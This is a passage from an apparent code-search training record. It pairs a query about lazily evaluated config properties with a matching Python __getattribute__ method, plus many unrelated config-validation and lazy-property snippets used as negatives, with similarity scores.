line\n exit_code = self.run_beat(\n extra_args=[\"-d\", \"config\", \"-E\", \"output.console=invalid\"])\n\n assert exit_code == 1\n assert self.log_contains(\"error unpacking config data\") is True", "def validate_input_string(self):\n invalid_string = \"\"\n try:\n for key in self.module.params:\n val = self.module.params[key]\n if key == \"description\" or key == \"snap_schedule_name\" \\\n or key == \"snap_schedule_id\":\n continue\n if isinstance(val, str) \\\n and val == invalid_string:\n errmsg = 'Invalid input parameter \"\" for {0}'.format(\n key)\n self.module.fail_json(msg=errmsg)\n\n except Exception as e:\n errormsg = \"Failed to validate the module param with \" \\\n \"error {0}\".format(str(e))\n LOG.error(errormsg)\n self.module.fail_json(msg=errormsg)", "def test_string_format():\n tree = parse(dedent(\"\"\"\\\n import logging\n\n logging.info(\"Hello 
{}\".format(\"World!\"))\n \"\"\"))\n visitor = LoggingVisitor()\n visitor.visit(tree)\n\n assert_that(visitor.violations, has_length(1))\n assert_that(visitor.violations[0][1], is_(equal_to(STRING_FORMAT_VIOLATION)))", "def _validate_string(display_name, input_value):\n\n if not isinstance(input_value, str):\n raise ValueError(display_name + \" must be a string type\")\n if input_value == '':\n raise ValueError(display_name + \" cannot be empty\")", "def _raise_error_with_context(context):\n context_str = \" \"\n for c in context:\n if isinstance(c, str):\n context_str = context_str + f\"in key {c} \"\n elif isinstance(c, int):\n context_str = context_str + f\"in index {c} \"\n raise ValueError(f\"Value{context_str}is required\")", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def test_configurations_create_invalid_value_type(self):\n values = '{\"key_buffer_size\": \"this is a string not int\"}'\n assert_unprocessable(instance_info.dbaas.configurations.create,\n CONFIG_NAME, values, CONFIG_DESC)", "def _validate_input_string(display_name, value):\n\n if value is None:\n raise ValueError(display_name + \" cannot be undefined.\")\n\n if value == \"\":\n raise ValueError(display_name + \" cannot be empty.\")", "def parseError(message):\n print(\"config error in \" + config_file + \": \" + message, file=sys.stderr)", "def test_single_specifier_needed(self):\n template = '{0} one too many {1}'\n value_count = 1\n msg = ('The formatter should only contain one '\n '\"{}\" specifier for the source field.')\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def test_empty(self):\n self.assertRaises(ParseException, self.flag.parseString, '')", "def test_tap_config_raise_exception_if_invalid_config_yet_after_retries(self):\n self._assert_raise_exception_on_invalid_file_content(\n test_case_invalid='config',\n invalid_file_contents=('', ' ', 'foo', '{\"foo\": 1')\n )", "def _checkSSFormatArg(ssformat):\n if ssformat == '':\n raise ShortStrException('ssformat argument cannot be the empty string')\n\n if not isinstance(ssformat, str):\n raise ShortStrException('ssformat argument must be a string with only characters *, c, l, u, and d')\n\n for c in ssformat:\n if c not in '*clud':\n raise ShortStrException('ssformat argument must be a string with only characters *, c, l, u, and d')", "def test_mult_specifiers_missing(self):\n template = '{0} too few {1}'\n value_count = 3\n msg = ('The formatter contains too few \"{}\" '\n 'specifiers for the number of source fields.')\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def test_configure_non_interactive_missing_field_value(ExampleComponentClass):\n\n with pytest.raises(\n ValueError,\n match=r\"^No configuration value found for annotated field 'FAKE_NAME.a' of type 'int'.\",\n ):\n configure(ExampleComponentClass(), {\"b\": \"bar\"}, name=\"FAKE_NAME\")", "def test_docker_args_invalid(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n docker_args: 666\n \"\"\"\n )\n\n self._invalid_config(\"must be a string\")", "def test_running_with_badly_formatted_config():\n cli_result = subprocess.run(\n ['kaiba', 'tests/files/bad_config.json', 'tests/files/input.json'],\n capture_output=True,\n )\n assert b\"'target' is a required property\" in cli_result.stderr", "def _validate_format(self, full_encrypted_value, 
**options):\n\n if not self.FORMAT_REGEX.match(full_encrypted_value):\n raise InvalidEncryptedValueError('Input value is not a valid '\n '[{current}] encryption value.'\n .format(current=self._get_algorithm()))", "def test_entrypoint_invalid(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n entrypoint: 666\n \"\"\"\n )\n\n self._invalid_config(\"must be a string\")", "def Invalid(\r\n self, s: str = \"\", e: Type[BaseException] = None, fail: bool = False\r\n ) -> None:\r\n ...", "def test_no_template(self):\n template = ''\n value_count = 2\n msg = 'No template has been provided for formatting multiple fields.'\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def test_invalid_config() -> None:\n config = {\"statsd\": {\"host1\": \"host1\"}}\n\n with pytest.raises(vol.Invalid):\n statsd.CONFIG_SCHEMA(None)\n with pytest.raises(vol.Invalid):\n statsd.CONFIG_SCHEMA(config)", "def __string(input_string, name=\"\", internal=False):\n if input_string is None:\n __ex(\"The %s is missing.\" % name, internal)\n if input_string == \"\":\n __ex(\"The %s must not be empty.\" % name, internal)", "def test_allow_unknown():\n template = 'name=\"{name}\" value=\"{value}\"'\n fmt = FormatTemplate(remove_unused=False)\n result = fmt(template)\n assert result == template", "def test_invalid_config_options_output():\n\n with pytest.raises(InputError):\n _check_input_config({\"unknown_key_1\": 1})", "def test_make_output_fail():\n with pytest.raises(ValueError):\n make_output_format('dummy_format', LOG_DIR)", "def _validate_value(value : Any) -> str:\n if isinstance(value, str):\n value = value.replace(\"'\", \"''\")\n return f'\"{value}\"'\n return f\"{value}\"", "def error_bad_value(user: discord.User, value_type: str, value: Any) -> str:\n return (\n f\"Hmmmm. 
{user.mention}, I'm having a hard time understanding the {value_type}\"\n f\" '{value}'.\"\n )", "def test_unsupported_format():\n formatter = TabularOutputFormatter()\n\n with pytest.raises(ValueError):\n formatter.format_name = \"foobar\"\n\n with pytest.raises(ValueError):\n formatter.format_output((), (), format_name=\"foobar\")", "def test_bad_config(self):\n # test a config with a missing particle classes dict\n config = {}\n stream_handle = open(os.path.join(RESOURCE_PATH,\n 'short_SNA_SNA.txt'), MODE_ASCII_READ)\n\n with self.assertRaises(ConfigurationException):\n self.parser = NutnrJCsppParser(config, stream_handle,\n self.exception_callback)\n\n # test a config with a missing data particle class key\n config = {\n DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {\n METADATA_PARTICLE_CLASS_KEY: NutnrJCsppMetadataTelemeteredDataParticle,\n }\n }\n\n with self.assertRaises(ConfigurationException):\n self.parser = NutnrJCsppParser(config, stream_handle,\n self.exception_callback)", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def test_readbadformat(self):\n\n self.assertRaises(ParseError, self.hw, self.badfile)", "def validate_format(self):\n raise NotImplementedError()", "def string_p(value):\n if type(value) is not str:\n raise Invalid(\"invalid value type {value}\".format(value=value))", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: D1Line(self.bad_line))", "def value_from_str(self, s):\n raise ValueError()", "def test_configurations_create_invalid_values(self):\n values = '{\"this_is_invalid\": 123}'\n try:\n instance_info.dbaas.configurations.create(\n CONFIG_NAME,\n values,\n CONFIG_DESC)\n except exceptions.UnprocessableEntity:\n resp, body = instance_info.dbaas.client.last_response\n assert_equal(resp.status, 422)", "def validate_string(s, name=''):\n assert (s is not None), name + ' settings should not be None'\n assert (isinstance(s, str)), name + ' settings should be a string'\n assert (s != ''), name + ' settings should be not be empty'", "def test_validate_failure_bad_config(self, value):\n sch = scheme.Scheme()\n with pytest.raises(errors.SchemeValidationError):\n sch.validate(value)", "def test_debug_string_format():\n tree = parse(dedent(\"\"\"\\\n import logging\n\n logging.debug(\"Hello {}\".format(\"World!\"))\n \"\"\"))\n visitor = LoggingVisitor()\n visitor.visit(tree)\n\n assert_that(visitor.violations, has_length(1))\n assert_that(visitor.violations[0][1], is_(equal_to(STRING_FORMAT_VIOLATION)))", "def command_error(fmt, *args, **kwargs):\n raise CommandError(fmt.format(*args, **kwargs))", "def _setter_error(self, msg, nval): # type: (str, Any) -> None\n logging.error('Cyra config value %s for field [%s] %s. 
Falling back to default value %s.'\n % (repr(nval), '.'.join(self._path), msg, repr(self._default)))", "def test_validate_aws_config():\n cfg = configparser.ConfigParser()\n cfg[CFG_BLAST] = {CFG_BLAST_PROGRAM: 'blastp',\n CFG_BLAST_RESULTS: 's3://test-results',\n CFG_BLAST_DB: 'test-db',\n CFG_BLAST_QUERY: 'test-queries'}\n\n valid_aws_provider = {\n CFG_CP_AWS_REGION: 'correct-Region-1',\n CFG_CP_AWS_SUBNET: 'subnet-2345145',\n CFG_CP_AWS_KEY_PAIR: 'foo',\n CFG_CP_AWS_SECURITY_GROUP: 'sg-2345145'\n }\n\n # test correct value\n cfg[CFG_CLOUD_PROVIDER] = valid_aws_provider\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n\n # test missing value\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_AWS_SUBNET: 'test-subnet'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Missing aws-region')]\n\n # test incorrect value\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_AWS_REGION: 'incorrect_region'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Parameter \"aws-region\" has an invalid value')]\n\n # Test BLAST programs\n cfg[CFG_CLOUD_PROVIDER] = valid_aws_provider\n # test missing BLAST program\n cfg[CFG_BLAST] = {CFG_BLAST_RESULTS: 's3://test-results'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Missing program')]\n\n # test invalid BLAST program\n cfg[CFG_BLAST] = {CFG_BLAST_PROGRAM: 'invalid_program',\n CFG_BLAST_RESULTS: 's3://test-results'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Parameter \"program\" has an invalid value')]", "def _check_tokens_are_valid(format_string, message):\n named_tokens = re.findall(r\"{(\\w*)}\", format_string)\n invalid_tokens = [x for x in named_tokens if x.lower() not in _valid_tokens]\n if invalid_tokens:\n msg = message\n msg += \" [{0}]. 
\".format(\", \".join(invalid_tokens))\n msg += 'Did you check your \"modules.yaml\" configuration?'\n raise RuntimeError(msg)", "def testParse_invalidKey(self):\n config_path = GetTestFilePath('invalid/config_invalid_key.yaml')\n with self.assertRaises(lab_config.ConfigError):\n with open(config_path, 'r') as f:\n lab_config.Parse(f)", "def test_arg_astringUnmatchedLiteralBraces(self):\n self.assertRaises(imap4.IllegalClientResponse,\n self.server.arg_astring, b'{0')", "def value_from_str(self, s):\n if s == 'sys.stderr':\n ### print(\"DecoSettingFile.value_from_str, s=%s, returning %r (sys.stderr?)\" % (s, sys.stderr))\n return sys.stderr\n # 'sys.stdout' ultimately becomes None via this:\n return super().value_from_str(s)", "def __verify_string_field(cls, plugin_instance, field_name, field_value):\n\n if not isinstance(field_value, str):\n raise BadPluginError(\n class_name=type(plugin_instance).__name__, field_name=field_name\n )\n if not field_value:\n raise BadPluginError(\n class_name=type(plugin_instance).__name__,\n field_name=field_name,\n is_empty=True,\n )", "def test_bad_config_recovery(mock_empty_os_environ):\n\n def check(d):\n if d and \"wrong\" in d:\n raise KeyError(\"Invalid config\")\n return d\n\n climate = core.Climate(prefix=\"this\", settings_file_suffix=\"suffix\", parser=check)\n assert dict(climate.settings) == {}\n\n # Try to set incorrect config\n with pytest.raises(KeyError):\n climate.update({\"wrong\": 2})\n assert dict(climate.settings) == {}, \"Setting should not have been updated\"\n assert climate._updates == [], \"No external data should have been set.\"\n\n # Updating with other fields will still trigger the error\n climate.update({\"right\": 2})\n assert dict(climate.settings) == {\"right\": 2}\n assert climate._updates == [{\"right\": 2}], \"External data should have been set.\"", "def test_modifier_parse_exceptions():\n\n parser = ConfigParser(io.StringIO())\n with pytest.raises(ConfigParserException):\n parser._parse_multi_range(u\"A\", u\"potential1 1.0 2.0 3.0 potential2 2.0\")", "def test_buoy_format1():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_buoy_format(buoy_format_fail_1)\n assert str(err_info.value) == 'Input formatted incorrectly, see instructions'", "def test_empty(self):\n record = ''\n\n self.assertRaises(ParseException, self.grammar.parseString, record)", "def test_validate_with_invalid_key_format_type(self):\n key_format_type = \"invalid\"\n kwargs = {'key_format_type': key_format_type}\n\n self.assertRaisesRegex(\n TypeError, \"invalid key format type\", Digest, **kwargs)", "def _str_validator(arg):\n if arg is None or arg is '' or type(arg) != str:\n raise ValueError('Incorrect value: input should be a string')", "def test_old_data_format_error(self):\n assert_raises(ValueError, get_data, self.testv1)", "def test_friendly_exception_formatting_exc_with_str_overload():\n ex = InsufficientSignatures(1, 3)\n\n formatted_exception = friendlyEx(ex)\n\n assert formatted_exception == '{}'.format(ex.reason)", "def test_format_name_attribute():\n formatter = TabularOutputFormatter(format_name=\"plain\")\n assert formatter.format_name == \"plain\"\n formatter.format_name = \"simple\"\n assert formatter.format_name == \"simple\"\n\n with pytest.raises(ValueError):\n formatter.format_name = \"foobar\"", "def Invalid(\r\n self, s: str = \"\", e: Type[BaseException] = None, fail: bool = False\r\n) -> None:\r\n ...", "def test_set_invalid_string_percentage(self):\n\n with self.assertRaises(ValueError):\n 
self.feature_test.set_percentage(\"meow\")", "async def test_return_error_if_any(request_format): # type: ignore[no-untyped-def]\n bad_python = \"this_is_bad = 'hihi\"\n\n response: HTTPResponse = await request_format(\n formatter=\"black\",\n code=[bad_python],\n options={\"line_length\": 123, \"string_normalization\": False},\n )\n json_result = _check_http_code_and_schema(\n response=response,\n expected_code=200,\n expected_schema=EXPECTED_FROMAT_SCHEMA,\n )\n assert json_result[\"code\"][0][\"error\"] == \"Cannot parse: 1:13: this_is_bad = 'hihi\"", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: C2Line(self.bad_line))", "def test_set_property_invalid(self):\r\n try:\r\n initial_value = self.config.values['option1']\r\n self.config.option1 = 'invalid'\r\n except Exception as e:\r\n self.assertIsInstance(e, InvalidOptionValueError)\r\n self.assertEqual(self.config.values['option1'], initial_value)", "def getstr(self, sec, name, default=None, badtypeok=False, morevars=None,\n taskvars=None):\n if sec in self.OLD_SECTIONS:\n sec = 'config'\n\n try:\n return super().getstr(sec, name, default=None,\n badtypeok=badtypeok, morevars=morevars,\n taskvars=taskvars).replace('//', '/')\n except NoOptionError:\n # if config variable is not set\n self.check_default(sec, name, default)\n return default.replace('//', '/')", "def test_creation_str():\n with pytest.raises(ValueError) as __:\n value = \"42\"\n __ = param.Integer(value=value)", "def test_recipient_not_str_error(\n config,\n):\n sms = YesssSMS.YesssSMS(\"0000000000\", \"2d4faa0ea6f55813\")\n with pytest.raises(ValueError):\n sms.send(176264916361239, \"test\")", "def test_datetime_invalid_string(self):\n self.assertRaises(RuntimeError, awstats_reader.awstats_datetime, '2009')", "def test_invalidValues(self):\n argV = \"--fooint egg\".split()\n self.assertRaises(usage.UsageError, self.usage.parseOptions, argV)", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def _check_with_cp_no_format(self, field, value):\n if not self._is_valid_cp_format(value):\n self._error(field, \"Invalid cellphone number format.\")", "def test_missing_key_from_config_fails_with_error(self, custom_config):\n del custom_config['subject']\n check = CommitMessagesCheck(CheckConfig('whatever', 'error', **custom_config))\n result = check.run({'commits': [{'message': 'xxxxx', 'sha': 'aa', 'url': ''}]})[\n 0\n ]\n\n assert result.success is False\n assert result.status is 'error'\n assert result.error_code is 'invalid_content'\n assert \"Missing key: 'stats'\" in result.details['message']", "def format_field(self, value, format_spec):\n if value is None:\n return format(value)\n else:\n return super(NoneFormatter, self).format_field(value, format_spec)\n if value is None:\n return format(value)\n else: raise e", "def test_error_on_invalid_volume_yaml(self):\n config = dict(\n version=1,\n applications={'mysql-hybridcluster': dict(\n image='busybox',\n volume='a random string',\n )}\n )\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n config)\n self.assertEqual(\n \"Application 'mysql-hybridcluster' has a config error. \"\n \"Invalid volume specification. 
Unexpected value: a random string\",\n exception.message\n )", "def test_validate_gcp_config():\n cfg = configparser.ConfigParser()\n cfg.read(f\"{TEST_DATA_DIR}/correct-cfg-file.ini\")\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n\n # test correct parameter values\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_GCP_PROJECT: 'correct-gcp-project',\n CFG_CP_GCP_REGION: 'correct-region-123',\n CFG_CP_GCP_ZONE: 'correct-zone-456'}\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n\n\n # test missing parameter values\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_GCP_NETWORK: 'test-network'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert len(messages) >= 3\n assert [s for s in messages if s.startswith('Missing gcp-project')]\n assert [s for s in messages if s.startswith('Missing gcp-region')]\n assert [s for s in messages if s.startswith('Missing gcp-zone')]\n\n # test incorrect parameter values\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_GCP_PROJECT: 'UPPERCASE-project',\n CFG_CP_GCP_REGION: 'region with space',\n CFG_CP_GCP_ZONE: 'zone-with#'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert len(messages) >= 3\n assert [s for s in messages if s.startswith('Parameter \"gcp-project\" has an invalid value')]\n assert [s for s in messages if s.startswith('Parameter \"gcp-region\" has an invalid value')]\n assert [s for s in messages if s.startswith('Parameter \"gcp-zone\" has an invalid value')]", "def _incomplete_error(self, option_name):\n msg = \"'{}' must be specified for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def log_format_error(caught_exception, event_str):\n\tcheck_type(caught_exception, Exception)\n\tcheck_type(event_str, StringType)\n\t\n\treturn '{0}, Class: {1}:{2}'.format(event_str, str(type(caught_exception)), caught_exception)", "def _validate_str(val):\n if not isinstance(val, str):\n raise ValueError(\"Passed value {} is not a string\".format(val))\n return val", "def test_decode_raises_when_format_unknown(thing):\n with pytest.raises(ValueError):\n decode(thing)", "def check_dataset_format(ds_format):\n if ds_format.lower() not in DATASET_FORMATS.keys():\n raise ValueError(\"dataset_format is expected to be one of %s. 
'%s' is not valid\" % (\n ', '.join(DATASET_FORMATS.keys()), ds_format,))", "def _invalid_option_error(self, option_name):\n msg = \"'{}' is not a valid option for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def testParse_emptyHostConfigs(self):\n # Has host_configs field but the field is empty is invalid.\n # This can not be pased by java's yaml lib.\n config_path = GetTestFilePath('invalid/config_empty_host_configs.yaml')\n with self.assertRaisesRegex(\n lab_config.ConfigError,\n r'when expecting a sequence\\nfound a blank string'):\n with open(config_path, 'r') as f:\n lab_config.Parse(f)", "def get_data_type_error_text(field_name, field_value, type_name):\n\n\tmessage = ''\n\n\ttry:\n\t\tmessage = (\"Value '{0}' entered for '{1}' could not be parsed as a valid {2}\"\n\t\t\t\t .format(str(field_value),field_name,type_name))\n\texcept TypeError:\n\t\tmessage = (\"A value entered for '{0}' could not be read\".format(field_name))\n\n\treturn message", "def _validate_value_formats(params, error_callback):\n try:\n local_ip = netaddr.IPNetwork(params['local_ip'])\n if local_ip.prefixlen == 32:\n raise netaddr.AddrFormatError('Invalid netmask')\n # If IPv6 the ctlplane network uses the EUI-64 address format,\n # which requires the prefix to be /64\n if local_ip.version == 6 and local_ip.prefixlen != 64:\n raise netaddr.AddrFormatError('Prefix must be 64 for IPv6')\n except netaddr.core.AddrFormatError as e:\n message = ('local_ip \"%s\" not valid: \"%s\" '\n 'Value must be in CIDR format.' %\n (params['local_ip'], str(e)))\n error_callback(message)\n hostname = params['undercloud_hostname']\n if hostname is not None and '.' not in hostname:\n message = 'Hostname \"%s\" is not fully qualified.' % hostname\n error_callback(message)", "def test_friendly_exception_formatting_exc_without_str_overload():\n ex = SigningException()\n\n formatted_exception = friendlyEx(ex)\n\n assert formatted_exception == '{}'.format(ex)", "def test_incorrect_formats(self, text):\n with pytest.raises(ValueError):\n parse_changelog(text)", "def test_model_output_is_missing_in_config(self):\n with self.assertRaisesRegex(\n ValueError, 'The config \\'Prediction field\\' should contain'):\n self.ci.run_with_metadata(\n indexed_inputs=self.dataset.indexed_examples,\n model=self.model,\n dataset=self.dataset,\n config={'Label': 'red'})", "async def test_can_use_black_config(request_format): # type: ignore[no-untyped-def]\n given = \"some_string='abc'\"\n expected = \"some_string = 'abc'\"\n\n response: HTTPResponse = await request_format(\n formatter=\"black\",\n code=[given],\n options={\"line_length\": 123, \"string_normalization\": False},\n )\n json_result = _check_http_code_and_schema(\n response=response,\n expected_code=200,\n expected_schema=EXPECTED_FROMAT_SCHEMA,\n )\n assert json_result[\"code\"][0][\"code\"] == expected", "def test_feed_value_throws_on_invalid_data(self):\n self.assertRaises(\n ValueError, self.factory.make_from_feed_value, \"foo\", 1\n )", "def raise_not_enough_arguments(self, string):\n\n\t\trequested = errors.number(self.counter + 1)\n\n\t\tnumber = len(self.positional)\n\n\t\tverb = \"was\" if number == 1 else \"were\"\n\n\t\twhat = \"Requested {} formatting argument for \"\\\n\t\t\t \"'{}' but only {} {} supplied!\"\n\n\t\twhat = what.format(requested, string, number, verb)\n\n\t\traise errors.ArgumentError(what)", "def test_broken_config(broken_config):\n with pytest.raises(RuntimeError, match=\"Error reading config.yml\"):\n 
abcconfig.get_config(broken_config)", "def fix_c4_002_005_missing_value(self, file, error_message):\n variable = file.split('_')[0]\n error_info = \"Corrected error where {} : correct missing value of 1.0e+20f inserted\".format(\n error_message.split('::')[-1].strip())\n self.ncatt._run_ncatted('missing_value', variable, 'o', 'f', '1.0e20', file, newfile=ofile)\n return error_info", "def format_to_print(key, value):\n if value < 0:\n sign = \"-\"\n else:\n sign = \"\"\n\n key = key.upper()\n if key.replace(\"_ERR\", \"\") not in (FLOAT_PARAMS + STR_PARAMS):\n raise ValueError(\"invalid key %r\" % key)\n\n if key in FLOAT_PARAMS or isinstance(value, basestring):\n return str(value)\n elif key in ['RA', 'RAJ', 'RA_ERR', 'RAJ_ERR']:\n sec = value / SIDFREQ\n if '_ERR' in key:\n return str(sec)\n m, s = divmod(sec, 60)\n h, m = divmod(m, 60)\n sign = \"\"\n if s >= 9.9995:\n return \"%s%.2d:%.2d:%.5f\" % (sign, h, m, s)\n else:\n return \"%s%.2d:%.2d:0%.5f\" % (sign, h, m, s)\n elif key in ['DEC', 'DECJ', 'DEC_ERR', 'DECJ_ERR']:\n # taken from: lscsoft/src/lalsuite/lalapps/src/pulsar\n # /HeterodyneSearch/pulsarpputils.py\n arc = np.degrees(np.fmod(np.fabs(value), np.pi))\n d = int(arc)\n arc = (arc - d) * 60.0\n m = int(arc)\n s = (arc - m) * 60.0\n if '_ERR' in key:\n return str(s)\n if s >= 9.9995:\n return \"%s%.2d:%.2d:%.5f\" % (sign, d, m, s)\n else:\n return \"%s%.2d:%.2d:0%.5f\" % (sign, d, m, s)\n else:\n raise TypeError(\"cannot format argument %s with value %r\"\n % (key, value))", "def test_error_on_volume_mountpoint_not_ascii(self):\n mountpoint_unicode = u'\\u2603'\n config = dict(\n version=1,\n applications={'mysql-hybridcluster': dict(\n image='busybox',\n volume={'mountpoint': mountpoint_unicode},\n )}\n )\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n config)\n self.assertEqual(\n \"Application 'mysql-hybridcluster' has a config error. \"\n \"Invalid volume specification. Mountpoint {mount} contains \"\n \"non-ASCII (unsupported).\".format(mount=mountpoint_unicode),\n exception.message\n )" ]
[ "0.6889008", "0.65927273", "0.6343142", "0.6240334", "0.60607684", "0.60268956", "0.5999315", "0.5850035", "0.58428705", "0.5835579", "0.5832608", "0.58293426", "0.58019817", "0.57879996", "0.5760329", "0.5742128", "0.57138693", "0.5656415", "0.5598235", "0.5593386", "0.5593015", "0.55859166", "0.55654144", "0.5528895", "0.5522541", "0.5508984", "0.54943436", "0.5492323", "0.54918927", "0.5490297", "0.5473431", "0.5453502", "0.54433256", "0.54355437", "0.5432062", "0.5424596", "0.5423571", "0.5395541", "0.5376848", "0.5373948", "0.53452104", "0.53438497", "0.5342349", "0.5335442", "0.53279537", "0.5316752", "0.53158695", "0.53123", "0.52935624", "0.52811205", "0.5277164", "0.52702767", "0.5269111", "0.526648", "0.52620786", "0.5247126", "0.52443475", "0.522913", "0.52255905", "0.52163064", "0.5204737", "0.52038336", "0.5200257", "0.51997083", "0.5182625", "0.51803505", "0.5174071", "0.51731455", "0.5172848", "0.5163374", "0.5157086", "0.5152675", "0.51521325", "0.5150432", "0.514392", "0.51416177", "0.5140807", "0.51366967", "0.5133895", "0.51334757", "0.5132931", "0.51314", "0.51282334", "0.5126051", "0.51246583", "0.5123259", "0.512064", "0.51157737", "0.51114553", "0.5110822", "0.5108811", "0.51041436", "0.5101994", "0.5100784", "0.50949043", "0.50941443", "0.5091492", "0.508215", "0.50789946", "0.507635", "0.5074067" ]
0.0
-1
Overloaded to implement recursive lazy evaluation of properties.
def __getattribute__(self, key):
    value = super(Config, self).__getattribute__(key)
    if key == "reserved" or key in self.reserved:
        return value
    else:
        return self.format(value, key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lazyprop(fn):\n\n @property\n def _lazyprop(self):\n if not hasattr(self, _LAZY_PROP_VALUES):\n setattr(self, _LAZY_PROP_VALUES, {})\n lazy_props_dict = self.__dict__[_LAZY_PROP_VALUES]\n if fn.__name__ not in lazy_props_dict:\n lazy_props_dict[fn.__name__] = fn(self)\n return lazy_props_dict[fn.__name__]\n\n return _lazyprop", "def lazyproperty(f: Callable[..., Any]):\n # pylint: disable=unused-variable\n return property(functools.lru_cache(maxsize=100)(f))", "def test_lazy_evaluation(self):\n pass", "def has_lazyprop(object, property_name):\n if hasattr(object, _LAZY_PROP_VALUES):\n return property_name in object.__dict__[_LAZY_PROP_VALUES]\n return False", "def lazy(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop", "def lazy_property_factory(lazy_property):\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter", "def evaluate_lazy_object(obj):\n wrapped_obj = getattr(obj, LAZY_OBJECT_NAME, None)\n if wrapped_obj is None:\n # if it isn't a lazy object then just return the original object...\n return obj\n if wrapped_obj is uninitialized_lazy_object:\n # if it is a lazy object but, hasn't been initialized yet\n # then initialize it & return it\n obj._setup()\n return getattr(obj, LAZY_OBJECT_NAME)\n # return the lazy object...\n return wrapped_obj", "def cached_property(f):\r\n def get(self):\r\n try:\r\n return self._property_cache[f]\r\n except AttributeError:\r\n self._property_cache = {}\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n except KeyError:\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n \r\n return property(get)", "def lazy_properties(*lazy_properties):\n def lazy_property_factory(lazy_property):\n \"\"\"Create properties that perform lazy loading of attributes.\"\"\"\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter\n\n def wrap_dataset(dataset):\n if not issubclass(dataset, InMemoryDataset):\n raise ValueError(\"Only InMemoryDataset supports lazy loading\")\n\n # Attach the lazy loading properties to the class\n for lazy_property in lazy_properties:\n setattr(dataset, lazy_property,\n property(*lazy_property_factory(lazy_property)))\n\n # Delete the values of lazy properties when serializing\n if not hasattr(dataset, '__getstate__'):\n def __getstate__(self):\n serializable_state = self.__dict__.copy()\n for lazy_property in lazy_properties:\n attr = serializable_state.get('_' + lazy_property)\n # Iterators would lose their state\n if isinstance(attr, collections.Iterator):\n raise ValueError(\"Iterators can't be lazy loaded\")\n serializable_state.pop('_' + lazy_property, None)\n return serializable_state\n setattr(dataset, '__getstate__', __getstate__)\n\n return dataset\n return wrap_dataset", "def clear_lazyprop(object, 
